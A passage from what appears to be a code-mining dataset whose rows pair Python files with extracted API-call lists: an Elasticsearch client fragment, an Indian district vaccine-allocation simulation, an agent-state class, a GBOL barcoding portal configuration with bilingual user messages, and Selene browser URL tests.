(['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_close"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_close')\n", (12001, 12056), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12491, 12555), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_open"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_open')\n", (12501, 12555), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13070, 13125), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (13080, 13125), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13766, 13868), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id', '"""_update"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id, '_update')\n", (13776, 13868), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14252, 14300), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (14262, 14300), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((15416, 15513), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""categories"""', 'category_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'categories', category_id)\n", (15426, 15513), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((16643, 16728), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""influencers"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'influencers')\n", (16653, 16728), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17291, 17343), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (17301, 17343), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17909, 17961), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (17919, 17961), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((18298, 18363), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_stats"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_stats')\n", (18308, 18363), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((19127, 19229), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id', '"""_revert"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id, '_revert')\n", (19137, 19229), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20259, 20350), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id)\n", (20269, 20350), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20941, 21032), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id)\n", (20951, 21032), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n')] |
import dask
import numpy as np
import pandas as pd
from epimargin.models import Age_SIRVD
from epimargin.utils import annually, normalize, percent, years
from studies.vaccine_allocation.commons import *
from tqdm import tqdm
import warnings
warnings.filterwarnings("error")
num_sims = 1000
simulation_range = 1 * years
phi_points = [_ * percent * annually for _ in (25, 50, 100, 200)]
simulation_initial_conditions = pd.read_csv(data/f"all_india_coalesced_scaling_Apr15.csv")\
.drop(columns = ["Unnamed: 0"])\
.set_index(["state", "district"])
rerun_states = ["Telangana", "Uttarakhand", "Jharkhand", "Arunachal Pradesh", "Nagaland", "Sikkim"] + coalesce_states
districts_to_run = simulation_initial_conditions
num_age_bins = 7
seed = 0
MORTALITY = [6, 5, 4, 3, 2, 1, 0]
CONTACT = [1, 2, 3, 4, 0, 5, 6]
CONSUMPTION = [4, 5, 6, 3, 2, 1, 0]
def save_metrics(tag, policy, dst = tev_src):
np.savez_compressed(dst/f"{tag}.npz",
dT = policy.dT_total,
dD = policy.dD_total,
pi = policy.pi,
q0 = policy.q0,
q1 = policy.q1,
Dj = policy.D
)
def prioritize(num_doses, S, prioritization):
Sp = S[:, prioritization]
dV = np.where(Sp.cumsum(axis = 1) <= num_doses, Sp, 0)
dV[np.arange(len(dV)), (Sp.cumsum(axis = 1) > dV.cumsum(axis = 1)).argmax(axis = 1)] = num_doses - dV.sum(axis = 1)
return dV[:, sorted(range(len(prioritization)), key = prioritization.__getitem__)].clip(0, S)
def process(district_data):
(
(state, district), state_code,
sero_0, N_0, sero_1, N_1, sero_2, N_2, sero_3, N_3, sero_4, N_4, sero_5, N_5, sero_6, N_6, N_tot,
Rt, Rt_upper, Rt_lower, S0, I0, R0, D0, dT0, dD0, V0, T_ratio, R_ratio
) = district_data
try:
S0 = int(S0)
except ValueError as e:
print (state, district, e)
return
Sj0 = np.array([(1 - sj) * Nj for (sj, Nj) in zip([sero_0, sero_1, sero_2, sero_3, sero_4, sero_5, sero_6], [N_0, N_1, N_2, N_3, N_4, N_5, N_6])])
# distribute historical doses assuming mortality prioritization
Sj0 = prioritize(V0, Sj0.copy()[None, :], MORTALITY)[0]
def get_model(seed = 0):
model = Age_SIRVD(
name = state_code + "_" + district,
population = N_tot - D0,
dT0 = (np.ones(num_sims) * dT0).astype(int),
Rt0 = 0 if S0 == 0 else Rt * N_tot / S0,
S0 = np.tile( Sj0, num_sims).reshape((num_sims, -1)),
I0 = np.tile((fI * I0).T, num_sims).reshape((num_sims, -1)),
R0 = np.tile((fR * R0).T, num_sims).reshape((num_sims, -1)),
D0 = np.tile((fD * D0).T, num_sims).reshape((num_sims, -1)),
mortality = np.array(list(OD_IFRs.values())),
infectious_period = infectious_period,
random_seed = seed,
)
model.dD_total[0] = np.ones(num_sims) * dD0
model.dT_total[0] = np.ones(num_sims) * dT0
return model
for phi in phi_points:
num_doses = phi * (S0 + I0 + R0)
sim_tag = f"{state_code}_{district}_phi{int(phi * 365 * 100)}_"
random_model, mortality_model, contact_model, no_vax_model = [get_model(seed) for _ in range(4)]
for t in range(simulation_range):
if t <= 1/phi:
dV_random = num_doses * normalize(random_model.N[-1], axis = 1).clip(0)
dV_mortality = prioritize(num_doses, mortality_model.N[-1], MORTALITY ).clip(0)
dV_contact = prioritize(num_doses, contact_model.N[-1], CONTACT ).clip(0)
else:
dV_random, dV_mortality, dV_contact = np.zeros((num_sims, 7)), np.zeros((num_sims, 7)), np.zeros((num_sims, 7))
random_model .parallel_forward_epi_step(dV_random, num_sims = num_sims)
mortality_model.parallel_forward_epi_step(dV_mortality, num_sims = num_sims)
contact_model .parallel_forward_epi_step(dV_contact, num_sims = num_sims)
no_vax_model .parallel_forward_epi_step(dV = np.zeros((7, num_sims))[:, 0], num_sims = num_sims)
if phi == phi_points[0]:
save_metrics(sim_tag + "novax", no_vax_model )
save_metrics(sim_tag + "random", random_model )
save_metrics(sim_tag + "mortality", mortality_model)
save_metrics(sim_tag + "contact", contact_model )
if __name__ == "__main__":
distribute = False
if distribute:
with dask.config.set({"scheduler.allowed-failures": 1}):
client = dask.distributed.Client(n_workers = 1, threads_per_worker = 1)
print(client.dashboard_link)
with dask.distributed.get_task_stream(client) as ts:
futures = []
for district in districts_to_run.itertuples():
futures.append(client.submit(process, district, key = ":".join(district[0])))
dask.distributed.progress(futures)
else:
failures = []
for t in tqdm(districts_to_run.itertuples(), total = len(districts_to_run)):
process(t)
# try:
# process(t)
# except Exception as e:
# failures.append((e, t))
for failure in failures:
print(failure)
| [
"dask.config.set",
"dask.distributed.progress",
"numpy.tile",
"numpy.ones",
"pandas.read_csv",
"dask.distributed.get_task_stream",
"epimargin.utils.normalize",
"dask.distributed.Client",
"numpy.zeros",
"numpy.savez_compressed",
"warnings.filterwarnings"
]
| [((242, 274), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""error"""'], {}), "('error')\n", (265, 274), False, 'import warnings\n'), ((937, 1076), 'numpy.savez_compressed', 'np.savez_compressed', (["(dst / f'{tag}.npz')"], {'dT': 'policy.dT_total', 'dD': 'policy.dD_total', 'pi': 'policy.pi', 'q0': 'policy.q0', 'q1': 'policy.q1', 'Dj': 'policy.D'}), "(dst / f'{tag}.npz', dT=policy.dT_total, dD=policy.\n dD_total, pi=policy.pi, q0=policy.q0, q1=policy.q1, Dj=policy.D)\n", (956, 1076), True, 'import numpy as np\n'), ((2950, 2967), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (2957, 2967), True, 'import numpy as np\n'), ((3002, 3019), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (3009, 3019), True, 'import numpy as np\n'), ((4548, 4598), 'dask.config.set', 'dask.config.set', (["{'scheduler.allowed-failures': 1}"], {}), "({'scheduler.allowed-failures': 1})\n", (4563, 4598), False, 'import dask\n'), ((4621, 4679), 'dask.distributed.Client', 'dask.distributed.Client', ([], {'n_workers': '(1)', 'threads_per_worker': '(1)'}), '(n_workers=1, threads_per_worker=1)\n', (4644, 4679), False, 'import dask\n'), ((4992, 5026), 'dask.distributed.progress', 'dask.distributed.progress', (['futures'], {}), '(futures)\n', (5017, 5026), False, 'import dask\n'), ((433, 493), 'pandas.read_csv', 'pd.read_csv', (["(data / f'all_india_coalesced_scaling_Apr15.csv')"], {}), "(data / f'all_india_coalesced_scaling_Apr15.csv')\n", (444, 493), True, 'import pandas as pd\n'), ((4742, 4782), 'dask.distributed.get_task_stream', 'dask.distributed.get_task_stream', (['client'], {}), '(client)\n', (4774, 4782), False, 'import dask\n'), ((3722, 3745), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3730, 3745), True, 'import numpy as np\n'), ((3747, 3770), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3755, 3770), True, 'import numpy as np\n'), ((3772, 3795), 'numpy.zeros', 'np.zeros', (['(num_sims, 7)'], {}), '((num_sims, 7))\n', (3780, 3795), True, 'import numpy as np\n'), ((2467, 2489), 'numpy.tile', 'np.tile', (['Sj0', 'num_sims'], {}), '(Sj0, num_sims)\n', (2474, 2489), True, 'import numpy as np\n'), ((2549, 2579), 'numpy.tile', 'np.tile', (['(fI * I0).T', 'num_sims'], {}), '((fI * I0).T, num_sims)\n', (2556, 2579), True, 'import numpy as np\n'), ((2631, 2661), 'numpy.tile', 'np.tile', (['(fR * R0).T', 'num_sims'], {}), '((fR * R0).T, num_sims)\n', (2638, 2661), True, 'import numpy as np\n'), ((2713, 2743), 'numpy.tile', 'np.tile', (['(fD * D0).T', 'num_sims'], {}), '((fD * D0).T, num_sims)\n', (2720, 2743), True, 'import numpy as np\n'), ((4135, 4158), 'numpy.zeros', 'np.zeros', (['(7, num_sims)'], {}), '((7, num_sims))\n', (4143, 4158), True, 'import numpy as np\n'), ((2341, 2358), 'numpy.ones', 'np.ones', (['num_sims'], {}), '(num_sims)\n', (2348, 2358), True, 'import numpy as np\n'), ((3405, 3442), 'epimargin.utils.normalize', 'normalize', (['random_model.N[-1]'], {'axis': '(1)'}), '(random_model.N[-1], axis=1)\n', (3414, 3442), False, 'from epimargin.utils import annually, normalize, percent, years\n')] |
'''Every agent has an agent state, which is its local view of the world'''
import numpy as np
import itertools
class AgentState:
def __init__(self, name, agt, seed=1234):
self.name = name
self.prng = np.random.RandomState(seed)
# contains the variable assignment (exploreD) for this agent and its neighbors
self.variables_assignments = {var.name: var.value for var in agt.variables}
self.this_agt = agt
## Data structures to explore assignment local to an agent
self.my_vars = [var.name for var in agt.variables]
# the iterator to all possible assignment for this agent
self.assignment_it = 0
# All possible assignments for the variables of this agent
domains = [var.domain for var in agt.variables]
self.agt_assignments_list = list(itertools.product(*domains))
def addNeighborsVariables(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def recvNeighborsValues(self, neighbor):
for var in neighbor.variables:
self.variables_assignments[var.name] = var.value
def copyAgtAssignmentToState(self):
for var in self.this_agt.variables:
self.variables_assignments[var.name] = var.value
def nextAssignment(self):
'''
If a next assignment for the agent local variables exists, then assign it
:var self.variables_assignments and return True. Otherwise return False.
'''
if self.assignment_it < len(self.agt_assignments_list):
self.setAssignmentIt(self.assignment_it)
self.assignment_it += 1
return True
else:
# Reset iterator
self.assignment_it = 0
return False
def setAssignmentIt(self, it):
for i, var_name in enumerate(self.my_vars):
self.variables_assignments[var_name] = self.agt_assignments_list[it][i] | [
"itertools.product",
"numpy.random.RandomState"
]
| [((221, 248), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (242, 248), True, 'import numpy as np\n'), ((837, 864), 'itertools.product', 'itertools.product', (['*domains'], {}), '(*domains)\n', (854, 864), False, 'import itertools\n')] |
import configparser
c = configparser.ConfigParser()
c.read("production.ini")
config = {}
config['host'] = c['dboption']['chost']
config['port'] = int(c['dboption']['cport'])
config['user'] = c['dboption']['cuser']
config['pw'] = c['dboption']['cpw']
config['db'] = c['dboption']['cdb']
config['homepath'] = c['option']['home']
config['hosturl'] = c['option']['hosturl']
config['news'] = c['news']
config['smtp'] = {}
config['smtp']['sender'] = c['option']['smtp-sender']
config['smtp']['server'] = c['option']['smtp']
config['collection_table'] = {}
config['collection_table']['template'] = c['option']['template_collection_sheet']
config['collection_table']['ordered'] = c['option']['collection_table_ordered']
config['collection_table']['filled'] = c['option']['collection_table_filled']
config['dwb'] = {}
config['dwb']['name_suffix'] = c['option']['dwb_name_suffix']
config['dwb']['connection_string'] = c['option']['dwb_connection_string']
config['dwb']['use_dwb'] = int(c['option']['use_dwb'])
if not c.has_option('option', 'dev_group'):
log.critical('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
raise NameError('Option `dev_group` is not defined in production.ini!\nPlease add at least one email to the list.')
config['dev_group'] = c['option']['dev_group']
taxon_ids = """100408, 100430, 100431, 100451, 100453, 3000243, 3100522, 3200125,
3200126, 4000014, 4402020, 4403366, 4403382, 4403383, 4404012,
4404135, 4404679, 4405947, 4406565, 4407062, 4408012, 5000093,
5000095, 5000203, 5009403, 5009532, 5100497, 5200013, 5210014,
5220011, 5400004, 5401236, 5413793, 5416518, 5416650, 5426341,
5428084, 5428327, 5428727, 5428849, 5428977, 5429029, 5429176,
5429405, 5430460, 5431215"""
states = {'de': ["Europa",
"Baden-Württemberg",
"Bayern",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hessen",
"Mecklenburg-Vorpommern",
"Niedersachsen",
"Nordrhein-Westfalen",
"Rheinland-Pfalz",
"Saarland",
"Sachsen",
"Sachsen-Anhalt",
"Schleswig-Holstein",
"Thüringen"],
'en': ["Europe",
"Baden-Württemberg",
"Bavaria",
"Berlin",
"Brandenburg",
"Bremen",
"Hamburg",
"Hesse",
"Mecklenburg-Vorpommern",
"Lower Saxony",
"North Rhine Westphalia",
"RhinelandPalatinate",
"Saarland",
"Saxony",
"Saxony-Anhalt",
"Schleswig-Holstein",
"Thuringia"]}
messages = {}
messages['results'] = {}
messages['results']['choose_taxa'] = {'de': '- Bitte wählen Sie ein Taxon aus -',
'en': '- Please choose a taxon -'}
messages['results']['choose_states'] = {'de': '- Bitte wählen Sie ein Bundesland aus -',
'en': '- Please choose a state -'}
messages['news_edit'] = {'de': ' Bearbeiten ', 'en': ' Edit '}
messages['news_reset'] = {'de': " Zurücksetzen ", 'en': " Reset "}
messages['news_reset_html'] = {'de': "<h2><strong>Titel</strong></h2><p>Inhalt</p>",
'en': "<h2><strong>Title</strong></h2><p>Content</p>"}
messages['news_message_saved'] = {'de': "News gespeichert!", 'en': "News saved!"}
messages['news_message_updated'] = {'de': "News bearbeitet!", 'en': "News updated!"}
messages['news_message_empty'] = {'de': "Bitte geben Sie Titel und Inhalt des neuen Newsbeitrages ein!",
'en': "Please enter title and content of the news posting!"}
messages['news_cancel'] = {'de': " Abbrechen ", 'en': " Cancel "}
messages['contact'] = {'de': 'Bitte überprüfen Sie die eingegebenen Daten.', 'en': 'Please check the data entered.'}
messages['contact_send'] = {'de': 'Die Mail wurde versandt!', 'en': 'Send mail was successful!'}
messages['letter_sender'] = {'de': 'Absender', 'en': 'Sender'}
messages['letter_send_to'] = {'de': 'Empfänger', 'en': 'Send to'}
messages['letter_order_no'] = {'de': 'Auftragsnummer {0}', 'en': 'Order no. {0}'}
messages['letter_no_samples'] = {'de': 'Anzahl Proben: {0}', 'en': 'No. samples: {0}'}
messages['letter_body1'] = {'de': 'Hinweis: Bitte drucken Sie das Anschreiben aus oder notieren Sie alternativ die ',
'en': 'Please print this cover letter or write the'}
messages['letter_body2'] = {'de': 'Auftragsnummer auf einem Zettel und legen diesen dem Probenpaket bei.',
'en': 'order number on a slip and send it together with your parcel '
'containing the samples.'}
messages['pls_select'] = {'de': 'Bitte wählen', 'en': 'Please select'}
messages['wrong_credentials'] = {'de': 'Falscher Benutzer oder Passwort!', 'en': 'Wrong user or password!'}
messages['still_locked'] = {'de': 'Sie wurden noch nicht von einem Koordinator freigeschaltet!',
'en': 'Your account must be unlocked by the Administrator!'}
messages['required_fields'] = {'de': 'Bitte alle Pflichtfelder ausfüllen!',
'en': 'Please fill out all required fields!'}
messages['username_present'] = {'de': 'Nutzername schon vorhanden, bitte wählen Sie einen anderen.',
'en': 'Username already present, please choose another one.'}
messages['user_created'] = {'de': 'Ihre Registrierungsanfrage wird bearbeitet. Sie werden in Kürze eine Email '
'Benachichtigung zum Stand Ihrer Freigabe für das GBOL Webportal erhalten.',
'en': 'User created. Please wait for unlock of your account by the administrator.'}
messages['reg_exp_mail_subject'] = {'de': 'Ihre Registrierung beim GBOL Webportal',
'en': 'Your Registration at GBOL Webportal'}
messages['reg_exp_mail_body'] = {'de': 'Hallo {salutation} {title} {vorname} {nachname},\n\n'
'wir haben Ihre Registrierung für die taxonomische Expertise {expertisename} '
'erhalten und an die entsprechenden Koordinatoren weitergeleitet.\n\n'
'Viele Grüße\nIhr GBOL Team',
'en': 'Hello {salutation} {title} {vorname} {nachname},\n\n'
'We have received Your registration for the taxonomic expertise {3} and '
'have send them to the corresponding GBOL-taxon coordinators.\n\n'
'Best regards,\nYour GBOL team'}
messages['reg_exp_chg_mail_body'] = {'de': 'Hallo {tk_user},\n\n{req_user} hat sich für die Expertise {expertisename} '
'registriert.\nBitte prüfen Sie die Angaben und zertifizieren die '
'Expertise anschließend.\n\nViele Grüße\nIhr GBOL Team',
'en': 'Hello {tk_user},\n\n{req_user} applies for the taxonomic expertise '
'{expertisename}.\nPlease check the data and approve or decline the request.'
'\n\nBest regards, Your GBOL team'}
messages['reg_exp_accept'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde erfolgreich von einem Koordinator freigegeben.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been approved by the coordinator.
Best regards,
The GBOL Team
"""}
messages['reg_exp_decline'] = {'de': """Hallo {3} {1} {2},
die Expertise {0} in Ihrem GBOL Konto wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich bei uns melden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {3} {1} {2}
The expertise {0} of your GBOL account has been refused by the coordinator.
If You have any questions regarding the GBOL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['pwd_forgot_email_body'] = {'de': """{0},
eine Anfrage zum Zurücksetzen des Passworts für Ihr Benutzerkonto auf
dem German Barcode of Life Webportal wurde gestellt.
Sie können Ihr Passwort mit einem Klick auf folgenden Link ändern:
http://{1}/sammeln/change-password?link={2}
Ihr Benutzername lautet: {3}
Dieser Link kann nur einmal verwendet werden und leitet Sie zu einer Seite,
auf der Sie ein neues Passwort festlegen können. Er ist einen Tag lang gültig
und läuft automatisch aus, falls Sie ihn nicht verwenden.
Viele Grüße
Das Team von German Barcode of Life""",
'en': """{0},
a request for password reset for your useraccount on the
German Barcode of Life webportal has been posed.
You can change your password with the following link:
http://{1}/sammeln/change-password?link={2}
Your user name is: {3}
Please note: this link can only be used once. The link will direct you to a
website where you can enter a new password.
The link is valid for one day.
Best wishes,
Your team from German Barcode of Life"""}
messages['pwd_forgot_email_subject'] = {'de': 'Neue Login-Daten für {0} auf German Barcode of Life',
'en': 'New login data for your user {0} on German Barcode of '
'Life webportal'}
messages['pwd_forgot_sent'] = {'de': 'Das Passwort und weitere Hinweise wurden an '
'die angegebene Email-Adresse gesendet.',
'en': 'The password and further tips werde sent to your email address.'}
messages['pwd_forgot_not_found'] = {'de': 'Es wurde kein Benutzer mit eingegebenem Namen bzw. Email gefunden.',
'en': 'No user found with the name or the email entered.'}
messages['pwd_unmatch'] = {'de': 'Die beiden Passwörter stimmen nicht überein.', 'en': 'Passwords do not match.'}
messages['pwd_saved'] = {'de': 'Neues Passwort gespeichert.', 'en': 'New password saved'}
messages['pwd__link_used'] = {'de': 'Link wurde bereits benutzt.', 'en': 'The link has been used already'}
messages['pwd__link_invalid'] = {'de': 'Kein gültiger Link.', 'en': 'Link invalid'}
messages['pwd__link_timeout'] = {'de': 'Link ist nicht mehr gültig.', 'en': 'Link has timed out'}
messages['order_success'] = {'de': 'Danke, Ihre Bestellung wurde entgegengenommen.',
'en': 'Thank You, the order has been received.'}
messages['order_info_missing'] = {'de': 'Bitte füllen Sie alle Felder aus.', 'en': 'Please fill out all fields.'}
messages['edt_no_passwd'] = {'de': 'Bitte geben Sie Ihr Passwort an, um das Benutzerprofil zu ändern.',
'en': 'Please provide your password in order to change the userprofile.'}
messages['edt_passwd_wrong'] = {'de': 'Falsches Passwort.', 'en': 'Wrong password.'}
messages['edt_passwd_mismatch'] = {'de': 'Die beiden neuen Passwörter stimmen nicht überein.',
'en': 'Both new passwords do not match.'}
messages['edt_success'] = {'de': 'Benutzerprofil erfolgreich geändert', 'en': 'Userprofile updated.'}
messages['err_upload'] = {'de': 'Ein Fehler ist beim Hochladen der Sammeltabelle aufgetreten. '
'Bitte schicken Sie Ihre Sammeltabelle per E-Mail an den Taxonkoordinator.',
'en': 'An error occured when uploading the collection sheet. Please sent it to the '
'taxon coordinator via e-mail.'}
messages['succ_upload'] = {'de': 'Die Sammeltabelle wurde erfolgreich hochgeladen!',
'en': 'Collection sheet uploaded successfully!'}
messages['download'] = {'de': 'Herunterladen', 'en': 'Download'}
messages['cert'] = {'de': 'zertifiziert', 'en': 'certified'}
messages['subm'] = {'de': 'beantragt', 'en': 'submitted'}
messages['select'] = {'de': 'Auswahl', 'en': 'Please select'}
messages['robot'] = {'de': 'Registrierung konnte nicht durchgeführt werden!', 'en': 'Could not process registration!'}
messages['email_reg_subject'] = {'de': 'GBOL Registrierung', 'en': 'GBOL Registration'}
messages['email_reg_body'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde erfolgreich von einem Koordinator freigegeben.
Sie können sich nun im dem Experten-Bereich anmelden.
Viele Grüße
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBOL account has been approved by the coordinator.
You can now login into the expert area.
Best regards,
The GBOL Team
"""}
messages['email_reg_body_decline'] = {'de': """"Hallo {4} {2} {3}
ihr GBOL Konto {0} wurde von einem Koordinator abgelehnt.
Sie können sich bei Fragen im Kontakt-Bereich von GBOL bei uns melden.
Best regards,
Ihr GBOL Team
""", 'en': """Hello {4} {2} {3}
Your GBoL account has been refused by the coordinator.
If You have any questions regarding the GBoL approval process, please send us a note in the contact area.
We will answer Your inquiry as soon as possible.
Best regards,
The GBOL Team
"""}
messages['states'] = {'de': {'raw': 'Neu', 'cooking': 'in Arbeit', 'done': 'Fertig'},
'en': {'raw': 'New', 'cooking': 'in progress', 'done': 'Done'}}
messages['error'] = {'de': 'Keine Ergebnisse gefunden', 'en': 'Nothing found'}
messages['coord'] = {'de': 'Koordinaten (lat/lon)', 'en': 'Coordinates (lat/lon)'}
messages['taxon'] = {'de': 'Taxon', 'en': 'Higher taxon'}
messages['ncoll'] = {'en': 'Not Collected', 'de': 'Nicht gesammelt'}
messages['nbar'] = {'en': 'No Barcode', 'de': 'Kein Barcode'}
messages['barc'] = {'en': 'Barcode', 'de': 'Barcode'}
messages['pub_updated'] = {'en': 'Publication updated!', 'de': 'Publikation bearbeitet!'}
messages['pub_saved'] = {'en': 'Publication saved!', 'de': 'Publikation gespeichert!'}
messages['pub_error'] = {'en': 'Please enter title and content of the publications posting!',
'de': 'Bitte geben Sie Titel und Inhalt des neuen Publikationsbeitrages ein!'}
messages['mail_req_body'] = """Guten Tag {0},
eine Bestellung für Versandmaterial wurde auf dem GBOL-Portal abgesendet.
Gesendet am {1}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe: {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Absender:
{name}
{street}
{city}
{country}
Email: {email}
"""
# -- In case of an error one of these messages are send to the dev_group specified in production.ini
messages['error'] = {}
messages['error']['order_processing'] = """
Eine Bestellung für Versandmaterial konnte nicht verarbeitet werden:
Bestellzeit: {1}
Koordinator (User-id): {0}
Möglicher Trasaktions-Key: {9}
Bestellung:
Material: {2}
Anzahl Verpackungseinheiten: {3}
Taxonomische Gruppe (ID): {4}
Nummer erstes Sammelröhrchen: {5}
Nummer letztes Sammelröhrchen: {6}
Bestellt von:
User-ID: {7}
Name: {8}
Fehler:
{10}
"""
| [
"configparser.ConfigParser"
]
| [((25, 52), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (50, 52), False, 'import configparser\n')] |
# MIT License
#
# Copyright (c) 2015-2020 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import pytest
from selene import have
from selene.core.exceptions import TimeoutException
start_page = 'file://' + os.path.abspath(os.path.dirname(__file__)) + '/../resources/start_page.html'
def test_have_url(session_browser):
session_browser.open(start_page)
session_browser.should(have.url(session_browser.driver.current_url))
session_browser.should(have.no.url(session_browser.driver.current_url[:-1]))
def test_have_url_containing(session_browser):
session_browser.open(start_page)
session_browser.should(have.url_containing('start_page.html'))
session_browser.should(have.no.url_containing('start_page.xhtml'))
def test_fails_on_timeout_during_waiting_for_exact_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url('xttp:/'))
# TODO: check message too
def test_fails_on_timeout_during_waiting_for_part_of_url(session_browser):
browser = session_browser.with_(timeout=0.1)
browser.open(start_page)
with pytest.raises(TimeoutException):
browser.should(have.url_containing('xttp:/'))
# TODO: check message too
| [
"selene.have.no.url_containing",
"os.path.dirname",
"selene.have.url_containing",
"pytest.raises",
"selene.have.url",
"selene.have.no.url"
]
